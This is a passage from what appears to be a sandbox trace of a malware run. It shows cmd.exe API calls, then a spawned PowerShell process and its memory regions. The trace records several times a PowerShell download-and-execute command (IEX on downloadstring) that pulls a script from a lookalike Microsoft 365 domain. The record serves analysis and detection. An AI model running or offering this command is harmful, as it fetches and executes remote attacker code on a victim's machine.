lpType=0x18e800*=0x4, lpData=0x18e820*=0x40, lpcbData=0x18e804*=0x4) returned 0x0 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x4, lpData=0x18e820*=0x40, lpcbData=0x18e804*=0x4) returned 0x0 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x0, lpData=0x18e820*=0x40, lpcbData=0x18e804*=0x1000) returned 0x2 [0125.503] RegCloseKey (hKey=0x44) returned 0x0 [0125.503] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e808 | out: phkResult=0x18e808*=0x44) returned 0x0 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x0, lpData=0x18e820*=0x40, lpcbData=0x18e804*=0x1000) returned 0x2 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x4, lpData=0x18e820*=0x1, lpcbData=0x18e804*=0x4) returned 0x0 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x0, lpData=0x18e820*=0x1, lpcbData=0x18e804*=0x1000) returned 0x2 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x4, lpData=0x18e820*=0x0, lpcbData=0x18e804*=0x4) returned 0x0 [0125.504] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x4, lpData=0x18e820*=0x9, lpcbData=0x18e804*=0x4) returned 0x0 [0125.504] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x4, lpData=0x18e820*=0x9, lpcbData=0x18e804*=0x4) returned 0x0 [0125.504] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x0, lpData=0x18e820*=0x9, lpcbData=0x18e804*=0x1000) returned 0x2 [0125.504] RegCloseKey (hKey=0x44) returned 0x0 [0125.504] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8801c3 [0125.504] srand (_Seed=0x5b8801c3) [0125.504] GetCommandLineW () returned="CMD.EXE /c C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -sta -nologo -nop -c IEX ((new-object net.webclient).downloadstring(\\\"http://ms365box.com/update.2\\\"))" [0125.504] GetCommandLineW () returned="CMD.EXE /c C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -sta -nologo -nop -c IEX ((new-object net.webclient).downloadstring(\\\"http://ms365box.com/update.2\\\"))" [0125.504] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a06c0a0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop") returned 0x1f [0125.504] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cad00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\CMD.EXE" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0125.505] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a05f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0125.505] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a05f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0125.505] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a05f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0125.505] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0125.505] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0125.505] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0125.505] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0125.505] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0125.505] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0125.505] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0125.505] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0125.505] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0125.505] GetEnvironmentStringsW () returned 0x2c8c50* [0125.506] FreeEnvironmentStringsW (penv=0x2c8c50) returned 1 [0125.506] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a05f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0125.506] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a05f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0125.506] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0125.506] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0125.506] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0125.506] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0125.506] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0125.506] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0125.506] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0125.506] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0125.506] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f610 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop") returned 0x1f [0125.506] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x104, lpBuffer=0x18f610, lpFilePart=0x18f5f0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x18f5f0*="Desktop") returned 0x1f [0125.507] GetFileAttributesW (lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop")) returned 0x11 [0125.507] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f320 | out: lpFindFileData=0x18f320) returned 0x2cc550 [0125.507] FindClose (in: hFindFile=0x2cc550 | out: hFindFile=0x2cc550) returned 1 [0125.507] FindFirstFileW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS", lpFindFileData=0x18f320 | out: lpFindFileData=0x18f320) returned 0x2cc550 [0125.508] FindClose (in: hFindFile=0x2cc550 | out: hFindFile=0x2cc550) returned 1 [0125.508] _wcsnicmp (_String1="ADU0VK~1", _String2="aDU0VK IWA5kLS", _MaxCount=0xe) returned 94 [0125.508] FindFirstFileW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFindFileData=0x18f320 | out: lpFindFileData=0x18f320) returned 0x2cc550 [0125.508] FindClose (in: hFindFile=0x2cc550 | out: hFindFile=0x2cc550) returned 1 [0125.508] GetFileAttributesW (lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop")) returned 0x11 [0125.508] SetCurrentDirectoryW (lpPathName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop")) returned 1 [0125.508] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aDU0VK IWA5kLS\\Desktop") returned 1 [0125.508] GetEnvironmentStringsW () returned 0x2cba00* [0125.508] FreeEnvironmentStringsW (penv=0x2cba00) returned 1 [0125.508] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a06c0a0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop") returned 0x1f [0125.509] GetConsoleOutputCP () returned 0x1b5 [0125.509] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a06bfe0 | out: lpCPInfo=0x4a06bfe0) returned 1 [0125.509] GetUserDefaultLCID () returned 0x409 [0125.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a067b50, cchData=8 | out: lpLCData=":") returned 2 [0125.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f720, cchData=128 | out: lpLCData="0") returned 2 [0125.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f720, cchData=128 | out: lpLCData="0") returned 2 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f720, cchData=128 | out: lpLCData="1") returned 2 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a07a740, cchData=8 | out: lpLCData="/") returned 2 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a07a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a07a460, cchData=32 | out: lpLCData="Tue") returned 4 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a07a420, cchData=32 | out: lpLCData="Wed") returned 4 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a07a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a07a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a07a360, cchData=32 | out: lpLCData="Sat") returned 4 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a07a700, cchData=32 | out: lpLCData="Sun") returned 4 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a067b40, cchData=8 | out: lpLCData=".") returned 2 [0125.514] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a07a4e0, cchData=8 | out: lpLCData=",") returned 2 [0125.514] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0125.515] GetConsoleTitleW (in: lpConsoleTitle=0x2c9910, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\CMD.EXE") returned 0x1b [0125.515] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77930000 [0125.515] GetProcAddress (hModule=0x77930000, lpProcName="CopyFileExW") returned 0x779423d0 [0125.515] GetProcAddress (hModule=0x77930000, lpProcName="IsDebuggerPresent") returned 0x77938290 [0125.515] GetProcAddress (hModule=0x77930000, lpProcName="SetConsoleInputExeNameW") returned 0x779417e0 [0125.519] _wcsicmp (_String1="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", _String2=")") returned 58 [0125.520] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 3 [0125.520] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 3 [0125.520] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 6 [0125.520] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 6 [0125.520] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 15 [0125.520] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 15 [0125.524] GetConsoleTitleW (in: lpConsoleTitle=0x18f630, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\CMD.EXE") returned 0x1b [0125.525] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0125.525] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0125.525] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f1c0, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f1a0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f1a0*=0xfcdf19fa, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0125.526] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0125.526] SetErrorMode (uMode=0x0) returned 0x8001 [0125.526] SetErrorMode (uMode=0x1) returned 0x0 [0125.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\.", nBufferLength=0x208, lpBuffer=0x2b1330, lpFilePart=0x18eec0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x18eec0*="v1.0") returned 0x2a [0125.527] SetErrorMode (uMode=0x8001) returned 0x1 [0125.527] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\.") returned 1 [0125.527] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a05f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0125.547] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0125.547] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", fInfoLevelId=0x1, lpFindFileData=0x18ec30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ec30) returned 0x2ca170 [0125.550] FindClose (in: hFindFile=0x2ca170 | out: hFindFile=0x2ca170) returned 1 [0125.551] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0125.551] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0125.551] GetConsoleTitleW (in: lpConsoleTitle=0x18f180, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\CMD.EXE") returned 0x1b [0125.551] InitializeProcThreadAttributeList (in: lpAttributeList=0x18ef38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18eef8 | out: lpAttributeList=0x18ef38, lpSize=0x18eef8) returned 1 [0125.551] UpdateProcThreadAttribute (in: lpAttributeList=0x18ef38, dwFlags=0x0, Attribute=0x60001, lpValue=0x18eee8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18ef38, lpPreviousValue=0x0) returned 1 [0125.552] GetStartupInfoW (in: lpStartupInfo=0x18f050 | out: lpStartupInfo=0x18f050*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\CMD.EXE", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x7, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0125.554] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0125.554] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0125.554] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0125.554] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0125.554] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0125.554] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0125.554] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0125.554] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0125.554] lstrcmpW (lpString1="\\powershell.exe", lpString2="\\XCOPY.EXE") returned -1 [0125.556] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -sta -nologo -nop -c IEX ((new-object net.webclient).downloadstring(\\\"http://ms365box.com/update.2\\\"))", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpStartupInfo=0x18ef70*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -sta -nologo -nop -c IEX ((new-object net.webclient).downloadstring(\\\"http://ms365box.com/update.2\\\"))", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ef20 | out: lpCommandLine="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -sta -nologo -nop -c IEX ((new-object net.webclient).downloadstring(\\\"http://ms365box.com/update.2\\\"))", lpProcessInformation=0x18ef20*(hProcess=0x54, hThread=0x50, dwProcessId=0xbf8, dwThreadId=0xbfc)) returned 1 [0126.361] CloseHandle (hObject=0x50) returned 1 [0126.361] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0126.361] GetEnvironmentStringsW () returned 0x2c8c50* [0126.361] FreeEnvironmentStringsW (penv=0x2c8c50) returned 1 [0126.361] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0152.659] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x18ee68 | out: lpExitCode=0x18ee68*=0x0) returned 1 [0152.659] CloseHandle (hObject=0x54) returned 1 [0152.659] _vsnwprintf (in: _Buffer=0x18f0d8, _BufferCount=0x13, _Format="%08X", _ArgList=0x18ee78 | out: _Buffer="00000000") returned 8 [0152.659] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0152.660] GetEnvironmentStringsW () returned 0x2cf010* [0152.660] FreeEnvironmentStringsW (penv=0x2cf010) returned 1 [0152.660] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0152.660] GetEnvironmentStringsW () returned 0x2cf010* [0152.660] FreeEnvironmentStringsW (penv=0x2cf010) returned 1 [0152.660] DeleteProcThreadAttributeList (in: lpAttributeList=0x18ef38 | out: lpAttributeList=0x18ef38) [0152.660] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.660] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0152.660] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.661] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a05e194 | out: lpMode=0x4a05e194) returned 1 [0152.661] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.661] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a05e198 | out: lpMode=0x4a05e198) returned 1 [0152.661] SetConsoleInputExeNameW () returned 0x1 [0152.661] GetConsoleOutputCP () returned 0x1b5 [0152.661] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a06bfe0 | out: lpCPInfo=0x4a06bfe0) returned 1 [0152.661] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0152.661] exit (_Code=0) Process: id = "3" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x25819000" os_pid = "0xbf8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xbe0" cmd_line = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -sta -nologo -nop -c IEX ((new-object net.webclient).downloadstring(\\\"http://ms365box.com/update.2\\\"))" cur_dir = "C:\\Users\\aDU0VK IWA5kLS\\Desktop\\" os_username = "AUFDDCNTXWT\\aDU0VK IWA5kLS" os_groups = "AUFDDCNTXWT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000117e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 669 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 670 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 671 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 672 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 673 start_va = 0x77b50000 end_va = 0x77cf8fff entry_point = 0x77b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 674 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 675 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 676 start_va = 0x13f120000 end_va = 0x13f196fff entry_point = 0x13f120000 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 677 start_va = 0x7feffe70000 end_va = 0x7feffe70fff entry_point = 0x7feffe70000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 678 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 679 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 680 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 681 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 682 start_va = 0x77930000 end_va = 0x77a4efff entry_point = 0x77930000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 683 start_va = 0x7fefdd20000 end_va = 0x7fefdd8afff entry_point = 0x7fefdd20000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 684 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 685 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 686 start_va = 0x1d0000 end_va = 0x236fff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 687 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 688 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 689 start_va = 0x77a50000 end_va = 0x77b49fff entry_point = 0x77a50000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 690 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 691 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 692 start_va = 0x7fef1d00000 end_va = 0x7fef1d6efff entry_point = 0x7fef1d00000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 693 start_va = 0x7fefb9f0000 end_va = 0x7fefba08fff entry_point = 0x7fefb9f0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 694 start_va = 0x7fefde70000 end_va = 0x7fefde7dfff entry_point = 0x7fefde70000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: 